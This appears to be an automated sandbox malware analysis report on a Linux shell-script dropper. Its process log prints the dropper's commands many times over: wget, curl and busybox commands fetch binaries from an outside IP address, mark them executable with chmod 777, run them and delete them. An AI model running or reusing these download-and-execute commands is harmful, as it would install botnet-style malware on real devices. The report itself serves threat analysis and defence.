Malware Analysis Report

2025-04-03 19:35

Sample ID 241028-c2h3lsybla
Target 56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
SHA256 56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91

Threat Level: Shows suspicious behavior

The file 56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:34

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 02:34

Reported

2024-10-28 02:36

Platform

debian9-mipsel-20240611-en

Max time kernel

78s

Max time network

80s

Command Line

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A

Processes

/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

